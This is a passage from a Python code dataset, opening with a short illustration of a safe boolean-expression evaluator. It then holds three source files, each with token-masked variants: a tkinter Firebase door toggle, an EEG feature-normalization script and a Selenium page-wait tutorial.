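compute() in the entry above is left as a stub. Purely as an illustration (nothing in the dataset implies this is the intended behaviour, and the class name here is hypothetical), one safe way to fill in such a class is to parse the stored expression with the ast module and evaluate only boolean constants and operators:

import ast

class BoolExpr:
    # Hypothetical evaluator for expressions like 'True and (False or not False)'.
    def __init__(self, expression):
        self.expression = expression

    def compute(self):
        return self._eval(ast.parse(self.expression, mode='eval').body)

    def _eval(self, node):
        if isinstance(node, ast.Constant) and isinstance(node.value, bool):
            return node.value
        if isinstance(node, ast.BoolOp):
            values = [self._eval(v) for v in node.values]
            return all(values) if isinstance(node.op, ast.And) else any(values)
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
            return not self._eval(node.operand)
        raise ValueError('unsupported expression node: %r' % node)

assert BoolExpr('True and (False or not False)').compute() is True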
99,897 | c5f6e54e343a818a057ba247a2005af314f37071 | import tkinter
from firebase import firebase
firebase = firebase.FirebaseApplication('https://atom940414.firebaseio.com', None)
# 按下open時可將 firebase 上 myhouse 的門打開
def openthedoor():
result = firebase.patch('/myhouse', {'open': 1})
# 按下close時可將 firebase 上 myhouse 的門關閉
def closethedoor():
result = firebase.patch('/myhouse', {'open': 0})
win = tkinter.Tk()
win.title('Door Open')
win.geometry('300x100')
OpenButton = tkinter.Button(win, text='Open', command=openthedoor) # UPdate 為上傳最新時間
OpenButton.config(font=('Arial', 20))
OpenButton.pack(side=tkinter.LEFT)
CloseButton = tkinter.Button(win, text='Close', command=closethedoor) # UPdate 為上傳最新時間
CloseButton.config(font=('Arial', 20))
CloseButton.pack(side=tkinter.RIGHT)
win.mainloop()
| [
"import tkinter\r\nfrom firebase import firebase\r\nfirebase = firebase.FirebaseApplication('https://atom940414.firebaseio.com', None)\r\n\r\n# 按下open時可將 firebase 上 myhouse 的門打開\r\ndef openthedoor():\r\n result = firebase.patch('/myhouse', {'open': 1})\r\n\r\n# 按下close時可將 firebase 上 myhouse 的門關閉\r\ndef closethedoor():\r\n result = firebase.patch('/myhouse', {'open': 0})\r\n\r\nwin = tkinter.Tk()\r\nwin.title('Door Open')\r\nwin.geometry('300x100')\r\n\r\nOpenButton = tkinter.Button(win, text='Open', command=openthedoor) # UPdate 為上傳最新時間\r\nOpenButton.config(font=('Arial', 20))\r\nOpenButton.pack(side=tkinter.LEFT)\r\n\r\nCloseButton = tkinter.Button(win, text='Close', command=closethedoor) # UPdate 為上傳最新時間\r\nCloseButton.config(font=('Arial', 20))\r\nCloseButton.pack(side=tkinter.RIGHT)\r\n\r\nwin.mainloop()\r\n\r\n",
"import tkinter\nfrom firebase import firebase\nfirebase = firebase.FirebaseApplication('https://atom940414.firebaseio.com',\n None)\n\n\ndef openthedoor():\n result = firebase.patch('/myhouse', {'open': 1})\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\nwin = tkinter.Tk()\nwin.title('Door Open')\nwin.geometry('300x100')\nOpenButton = tkinter.Button(win, text='Open', command=openthedoor)\nOpenButton.config(font=('Arial', 20))\nOpenButton.pack(side=tkinter.LEFT)\nCloseButton = tkinter.Button(win, text='Close', command=closethedoor)\nCloseButton.config(font=('Arial', 20))\nCloseButton.pack(side=tkinter.RIGHT)\nwin.mainloop()\n",
"<import token>\nfirebase = firebase.FirebaseApplication('https://atom940414.firebaseio.com',\n None)\n\n\ndef openthedoor():\n result = firebase.patch('/myhouse', {'open': 1})\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\nwin = tkinter.Tk()\nwin.title('Door Open')\nwin.geometry('300x100')\nOpenButton = tkinter.Button(win, text='Open', command=openthedoor)\nOpenButton.config(font=('Arial', 20))\nOpenButton.pack(side=tkinter.LEFT)\nCloseButton = tkinter.Button(win, text='Close', command=closethedoor)\nCloseButton.config(font=('Arial', 20))\nCloseButton.pack(side=tkinter.RIGHT)\nwin.mainloop()\n",
"<import token>\n<assignment token>\n\n\ndef openthedoor():\n result = firebase.patch('/myhouse', {'open': 1})\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\n<assignment token>\nwin.title('Door Open')\nwin.geometry('300x100')\n<assignment token>\nOpenButton.config(font=('Arial', 20))\nOpenButton.pack(side=tkinter.LEFT)\n<assignment token>\nCloseButton.config(font=('Arial', 20))\nCloseButton.pack(side=tkinter.RIGHT)\nwin.mainloop()\n",
"<import token>\n<assignment token>\n\n\ndef openthedoor():\n result = firebase.patch('/myhouse', {'open': 1})\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n\n\ndef closethedoor():\n result = firebase.patch('/myhouse', {'open': 0})\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
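In the entry above, the Chinese comments say that pressing Open/Close sets the `open` field of `myhouse` in a Firebase Realtime Database to 1 or 0 (the trailing comments are leftover "upload latest time" notes). A minimal sketch of the same button-to-callback wiring with the network call stubbed out, so it runs without the firebase package or any credentials:

import tkinter

def set_door(state):
    # Stand-in for firebase.patch('/myhouse', {'open': state}).
    print('door open =', state)

win = tkinter.Tk()
win.title('Door Open')
win.geometry('300x100')

open_btn = tkinter.Button(win, text='Open', font=('Arial', 20),
                          command=lambda: set_door(1))
open_btn.pack(side=tkinter.LEFT)

close_btn = tkinter.Button(win, text='Close', font=('Arial', 20),
                           command=lambda: set_door(0))
close_btn.pack(side=tkinter.RIGHT)

win.mainloop()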
99,898 | bbab221eb62676a9b62ced0fe045932228c05b95 | import numpy as np
from tqdm import tqdm
import os
def normalization():
print('Normalization...')
modes = ['train', 'test']
for mode in modes:
features = []
if mode == 'train':
eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')
eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')
emg = np.load('./data/train_emg_fft_features_new.npy')
else:
eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')
eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')
emg = np.load('./data/test_emg_fft_features_new.npy')
eeg1 = np.log(eeg1)
eeg2 = np.log(eeg2)
emg = np.log(emg)
for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):
eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)) / np.std(eeg1_sig, axis=0, keepdims=True)
eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)) / np.std(eeg2_sig, axis=0, keepdims=True)
emg_sig = np.sum(emg_sig, axis=0, keepdims=True)
emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)
eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))
eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))
emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))
features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig), axis=2))
features = np.array(features)
np.save('./data/{}_x.npy'.format(mode), np.array(features))
def generate_feature_with_adjacent_epochs():
print('concat adjacent epochs feature')
modes = ['train', 'test']
for mode in modes:
base_dir = './data/features_{}'.format(mode)
if not os.path.exists(base_dir):
os.mkdir(base_dir)
features = np.load('./data/{}_x.npy'.format(mode))
idx = 0
if mode == 'train':
sub_num = 3
else:
sub_num = 2
for i in range(sub_num):
sub_feature = features[i * 21600:(i + 1) * 21600]
sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(sub_feature[:, :, :, 2])) / np.std(
sub_feature[:, :, :, 2])
for j in tqdm(range(len(sub_feature))):
lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1], sub_feature[j],
sub_feature[(j + 1) % len(sub_feature)], sub_feature[(j + 2) % len(sub_feature)]),
axis=1)
np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.array(lf))
idx+=1
def main():
print()
print('***************By Killer Queen***************')
normalization()
generate_feature_with_adjacent_epochs()
main()
| [
"import numpy as np\nfrom tqdm import tqdm\nimport os\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1))\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig), axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(sub_feature[:, :, :, 2])) / np.std(\n sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1], sub_feature[j],\n sub_feature[(j + 1) % len(sub_feature)], sub_feature[(j + 2) % len(sub_feature)]),\n axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.array(lf))\n idx+=1\n\n\ndef main():\n print()\n print('***************By Killer Queen***************')\n\n normalization()\n generate_feature_with_adjacent_epochs()\n\n\nmain()\n",
"import numpy as np\nfrom tqdm import tqdm\nimport os\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)\n ) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)\n ) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1)\n )\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig),\n axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\ndef main():\n print()\n print('***************By Killer Queen***************')\n normalization()\n generate_feature_with_adjacent_epochs()\n\n\nmain()\n",
"<import token>\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)\n ) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)\n ) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1)\n )\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig),\n axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\ndef main():\n print()\n print('***************By Killer Queen***************')\n normalization()\n generate_feature_with_adjacent_epochs()\n\n\nmain()\n",
"<import token>\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)\n ) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)\n ) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1)\n )\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig),\n axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\ndef main():\n print()\n print('***************By Killer Queen***************')\n normalization()\n generate_feature_with_adjacent_epochs()\n\n\n<code token>\n",
"<import token>\n\n\ndef normalization():\n print('Normalization...')\n modes = ['train', 'test']\n for mode in modes:\n features = []\n if mode == 'train':\n eeg1 = np.load('./data/train_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/train_eeg2_fft_features_new.npy')\n emg = np.load('./data/train_emg_fft_features_new.npy')\n else:\n eeg1 = np.load('./data/test_eeg1_fft_features_new.npy')\n eeg2 = np.load('./data/test_eeg2_fft_features_new.npy')\n emg = np.load('./data/test_emg_fft_features_new.npy')\n eeg1 = np.log(eeg1)\n eeg2 = np.log(eeg2)\n emg = np.log(emg)\n for eeg1_sig, eeg2_sig, emg_sig in tqdm(zip(eeg1, eeg2, emg)):\n eeg1_sig = (eeg1_sig - np.mean(eeg1_sig, axis=0, keepdims=True)\n ) / np.std(eeg1_sig, axis=0, keepdims=True)\n eeg2_sig = (eeg2_sig - np.mean(eeg2_sig, axis=0, keepdims=True)\n ) / np.std(eeg2_sig, axis=0, keepdims=True)\n emg_sig = np.sum(emg_sig, axis=0, keepdims=True)\n emg_sig = emg_sig.repeat(eeg1_sig.shape[0], axis=0)\n eeg1_sig = eeg1_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n eeg2_sig = eeg2_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[\n 1], 1))\n emg_sig = emg_sig.reshape((eeg1_sig.shape[0], eeg1_sig.shape[1], 1)\n )\n features.append(np.concatenate((eeg1_sig, eeg2_sig, emg_sig),\n axis=2))\n features = np.array(features)\n np.save('./data/{}_x.npy'.format(mode), np.array(features))\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n\n\ndef generate_feature_with_adjacent_epochs():\n print('concat adjacent epochs feature')\n modes = ['train', 'test']\n for mode in modes:\n base_dir = './data/features_{}'.format(mode)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n features = np.load('./data/{}_x.npy'.format(mode))\n idx = 0\n if mode == 'train':\n sub_num = 3\n else:\n sub_num = 2\n for i in range(sub_num):\n sub_feature = features[i * 21600:(i + 1) * 21600]\n sub_feature[:, :, :, 2] = (sub_feature[:, :, :, 2] - np.mean(\n sub_feature[:, :, :, 2])) / np.std(sub_feature[:, :, :, 2])\n for j in tqdm(range(len(sub_feature))):\n lf = np.concatenate((sub_feature[j - 2], sub_feature[j - 1],\n sub_feature[j], sub_feature[(j + 1) % len(sub_feature)],\n sub_feature[(j + 2) % len(sub_feature)]), axis=1)\n np.save(os.path.join(base_dir, '{}.npy'.format(idx)), np.\n array(lf))\n idx += 1\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
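The entry above log-transforms FFT power features, z-scores each EEG epoch along its first axis, collapses EMG to a summed value broadcast across bins, and later stacks each epoch with its two neighbours on either side. A small sketch of just the per-epoch log/z-score step, with a random array standing in for one epoch's power matrix (the 60x48 shape is a placeholder):

import numpy as np

def zscore_log_power(epoch_power):
    # Log-transform, then normalise along axis 0 to zero mean and unit variance.
    log_power = np.log(epoch_power)
    mean = np.mean(log_power, axis=0, keepdims=True)
    std = np.std(log_power, axis=0, keepdims=True)
    return (log_power - mean) / std

epoch = np.random.rand(60, 48).astype(np.float32) + 1e-3  # strictly positive fake power values
normed = zscore_log_power(epoch)
assert normed.shape == (60, 48)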
99,899 | 07b5ecd51e80969ff6cbced98e0397e21733cff1 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# 页面等待
# 注意:这是非常重要的一部分!!
#
# 现在的网页越来越多采用了 Ajax 技术,这样程序便不能确定何时某个元素完全加载出来了。如果实际页面等待时间过长导致某个dom元素还没出来,但是你的代码直接使用了这个WebElement,那么就会抛出NullPointer的异常。
#
# 为了避免这种元素定位困难而且会提高产生 ElementNotVisibleException 的概率。所以 Selenium 提供了两种等待方式,一种是隐式等待,一种是显式等待。
#
# 隐式等待是等待特定的时间,显式等待是指定某一条件直到这个条件成立时继续执行。
# 显式等待
# 1.显式等待指定某个条件,然后设置最长等待时间。如果在这个时间还没有找到元素,那么便会抛出异常了。
from selenium import webdriver
from selenium.webdriver.common.by import By
# WebDriverWait 库,负责循环等待
from selenium.webdriver.support.ui import WebDriverWait
# expected_conditions 类,负责条件出发
from selenium.webdriver.support import expected_conditions as EC
driver = webdriver.Chrome()
driver.get("http://www.xxxxx.com/loading")
try:
# 页面一直循环,直到 id="myDynamicElement" 出现
element = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.ID, "myDynamicElement"))
)
finally:
driver.quit()
# 如果不写参数,程序默认会 0.5s 调用一次来查看元素是否已经生成,如果本来元素就是存在的,那么会立即返回。
# 下面是一些内置的等待条件,你可以直接调用这些条件,而不用自己写某些等待条件了。
# title_is
# title_contains
# presence_of_element_located
# visibility_of_element_located
# visibility_of
# presence_of_all_elements_located
# text_to_be_present_in_element
# text_to_be_present_in_element_value
# frame_to_be_available_and_switch_to_it
# invisibility_of_element_located
# element_to_be_clickable – it is Displayed and Enabled.
# staleness_of
# element_to_be_selected
# element_located_to_be_selected
# element_selection_state_to_be
# element_located_selection_state_to_be
# alert_is_present
# 2. 隐式等待
# 隐式等待比较简单,就是简单地设置一个等待时间,单位为秒。当然如果不设置,默认等待时间为0。
from selenium import webdriver
driver = webdriver.Chrome()
driver.implicitly_wait(10) # seconds
driver.get("http://www.xxxxx.com/loading")
myDynamicElement = driver.find_element_by_id("myDynamicElement") | [
"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# 页面等待\n\n# 注意:这是非常重要的一部分!!\n#\n# 现在的网页越来越多采用了 Ajax 技术,这样程序便不能确定何时某个元素完全加载出来了。如果实际页面等待时间过长导致某个dom元素还没出来,但是你的代码直接使用了这个WebElement,那么就会抛出NullPointer的异常。\n#\n# 为了避免这种元素定位困难而且会提高产生 ElementNotVisibleException 的概率。所以 Selenium 提供了两种等待方式,一种是隐式等待,一种是显式等待。\n#\n# 隐式等待是等待特定的时间,显式等待是指定某一条件直到这个条件成立时继续执行。\n\n# 显式等待\n# 1.显式等待指定某个条件,然后设置最长等待时间。如果在这个时间还没有找到元素,那么便会抛出异常了。\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n# WebDriverWait 库,负责循环等待\nfrom selenium.webdriver.support.ui import WebDriverWait\n# expected_conditions 类,负责条件出发\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome()\ndriver.get(\"http://www.xxxxx.com/loading\")\ntry:\n # 页面一直循环,直到 id=\"myDynamicElement\" 出现\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"myDynamicElement\"))\n )\nfinally:\n driver.quit()\n\n# 如果不写参数,程序默认会 0.5s 调用一次来查看元素是否已经生成,如果本来元素就是存在的,那么会立即返回。\n# 下面是一些内置的等待条件,你可以直接调用这些条件,而不用自己写某些等待条件了。\n# title_is\n# title_contains\n# presence_of_element_located\n# visibility_of_element_located\n# visibility_of\n# presence_of_all_elements_located\n# text_to_be_present_in_element\n# text_to_be_present_in_element_value\n# frame_to_be_available_and_switch_to_it\n# invisibility_of_element_located\n# element_to_be_clickable – it is Displayed and Enabled.\n# staleness_of\n# element_to_be_selected\n# element_located_to_be_selected\n# element_selection_state_to_be\n# element_located_selection_state_to_be\n# alert_is_present\n\n# 2. 隐式等待\n# 隐式等待比较简单,就是简单地设置一个等待时间,单位为秒。当然如果不设置,默认等待时间为0。\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10) # seconds\ndriver.get(\"http://www.xxxxx.com/loading\")\nmyDynamicElement = driver.find_element_by_id(\"myDynamicElement\")",
"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\ndriver = webdriver.Chrome()\ndriver.get('http://www.xxxxx.com/loading')\ntry:\n element = WebDriverWait(driver, 10).until(EC.\n presence_of_element_located((By.ID, 'myDynamicElement')))\nfinally:\n driver.quit()\nfrom selenium import webdriver\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10)\ndriver.get('http://www.xxxxx.com/loading')\nmyDynamicElement = driver.find_element_by_id('myDynamicElement')\n",
"<import token>\ndriver = webdriver.Chrome()\ndriver.get('http://www.xxxxx.com/loading')\ntry:\n element = WebDriverWait(driver, 10).until(EC.\n presence_of_element_located((By.ID, 'myDynamicElement')))\nfinally:\n driver.quit()\n<import token>\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10)\ndriver.get('http://www.xxxxx.com/loading')\nmyDynamicElement = driver.find_element_by_id('myDynamicElement')\n",
"<import token>\n<assignment token>\ndriver.get('http://www.xxxxx.com/loading')\ntry:\n element = WebDriverWait(driver, 10).until(EC.\n presence_of_element_located((By.ID, 'myDynamicElement')))\nfinally:\n driver.quit()\n<import token>\n<assignment token>\ndriver.implicitly_wait(10)\ndriver.get('http://www.xxxxx.com/loading')\n<assignment token>\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n"
] | false |
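The Chinese comments in the entry above make the standard Selenium point: an explicit wait polls for a specific expected condition until a timeout (by default roughly every 0.5 s), while an implicit wait sets one global timeout applied to every element lookup. Note that in current Selenium releases the find_element_by_id style helpers are deprecated or removed in favour of find_element(By.ID, ...). A sketch of both wait styles against the placeholder URL used in the row:

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

# Explicit wait: block until the condition holds, or raise TimeoutException after 10 s.
driver = webdriver.Chrome()
driver.get("http://www.xxxxx.com/loading")
try:
    element = WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.ID, "myDynamicElement"))
    )
finally:
    driver.quit()

# Implicit wait: one global timeout applied to every find_element call.
driver = webdriver.Chrome()
driver.implicitly_wait(10)
driver.get("http://www.xxxxx.com/loading")
try:
    element = driver.find_element(By.ID, "myDynamicElement")
finally:
    driver.quit()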